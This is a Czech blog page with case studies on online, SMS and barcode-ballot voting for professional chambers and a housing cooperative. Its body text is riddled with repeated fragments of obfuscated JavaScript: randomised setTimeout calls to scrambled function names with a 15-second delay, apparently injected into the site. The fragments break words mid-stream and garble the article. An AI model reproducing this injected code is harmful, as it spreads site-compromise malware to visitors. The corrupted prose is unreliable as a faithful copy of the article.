0

Příkladové studie: Volby doma v teple nebo za plentou?

Kategorie: Elektronické volby

Model hlasování online

Model hlasování online

Drosera programuje inovativní kroky k vcelku vzdáleným cílům. Jsou to volby-online  pro sdružení, bytová družstva a možná i k referendům ve městech a obcích.

Volební systém Drosera  můžeme rozdělit na 3 hlavní kategorie hlasování, tj. volby přes webové stránky (1), volby přes zaslání SMS zprávy(2) a volby přes volební lístky s čárovými kódy(3).  Jednotlivé kategorie se pak člení dle typu voleb (hlasování o kandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andidátech, referenda, …) a dle hlasovacích systémů (většinový, blokové hlasování,…). Každá kategorie hlasování má několik svých specifik, například u zajištění bezpečnosti, kontroly evidence hlasujících,  atd… Dost však bylo kategorizací, pojďme si říci, co online volby umí.

 

  1. Příkladová studie komory veterinářůandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

Komora veterinářů má ve stanovách, že volba kandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andidátů do vedení komory může proběhnout přes internet (přes webové stránky).  Databáze členské základy obsahující jména, emaily a mobilní čísla se importuje do volebního systému. Volební systém rozešle přes email/sms přihlašovací údaje členů.  V termín voleb se člen přihlásí do volebního systému a vybere kandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andidáta do vedení. Výsledky voleb jsou známi ihned po ukončení termínu voleb. Ušetřen byl 1 den člena komoryandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);} (neúčastnil se schůze). Náklady na administraciandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);} schůze popřípadě náklady na hlasovací zařízení v desítkách tisíc.

  1. Příkladová studie pro Komoru lékařů:andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

Komora lékařů připravuje volební sjezd. Sjezd se bude konat 2 dny a komora potřebuje pro 2000 členů pronajmout hlasovací stanice. Pokud hlasovací zařízení v takto velkém počtu sežene, rozpočet hlasování se pohybuje okolo 100tis. Zde se nabízí možnost vyměnit hlasovací zařízení za mobil člena komory a přes odeslání SMS zprávy provést jednotlivá hlasování. Způsob funguje na podobném principu jako různé soutěže, ve kterých na určité číslo odesíláte ze svého mobilního telefonu přesně definovanou soutěžní SMS odpověď.  Při zvolení tohoto řešení lze ušetřit 50% nákladů.andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

Nová, inovativní řešení potřebují uzrát, ne každý chce měnit zaběhlá pravidla a nově přemýšlet nad nyní nestandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andardním řešením online voleb. Věříme, že jednoduchý a levnější online svět nakonec zvítězí.

  1. Příkladová studie elektronických voleb pro Bytové družstvo:andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

Dle stanov bytového družstva se členové musí scházet na valné hromadě. Každý člen družstva má poměrný počet hlasů dle velikosti bytu. Členů družstva v panelovém domě může být  přes 100 a předem se neví, jestli přijde usnášeníschopná část a o čem se bude hlasovat. Volební systém si umí s těmito podmínkami poradit. U příchodu do hlasovací místnosti (v některých případech to může být garáž, zažil jsem osobně)identifikujeme příchod člena družstva přes jeho unikátní hlasovací kód. Členovi předáme předtištěné volební lístky s unikátními kódy jak pro osobu, tak pro jednotlivá hlasování.  Při každém hlasování člen družstva předá lístek s odpovědí (kódem pro Ano nebo Ne nebo Zdržel se) volební komisi, která lístek přes čtečku zaeviduje. Aby se sčítání urychlilo, lze přes čtečku sčítat jen menší poměr odpovědí a ostatní poměry odpovědí se mohou doplnit hromadně.  Tento způsob se velmi osvědčil i v případě, když se hlasuje pouze zvednutím ruky nebo když mají všichni členové shodný názor.  Sečteno, podtrženo  valná hromada se tak zkrátí přibližně o 30-50% z celkového času konání.andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);} Členové družstva se rychle mohou věnovat svým soukromým aktivitám. Správce družstva zase ušetří čas u pracovní doby zaměstnanců, kteří volby administrují.

Tweet about this on TwitterShare on FacebookEmail this to someone
lospapunos@seznam.cz'

Komentáře

Loading Facebook Comments ...

Napsat komentář

Vaše emailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *

fourteen − ten =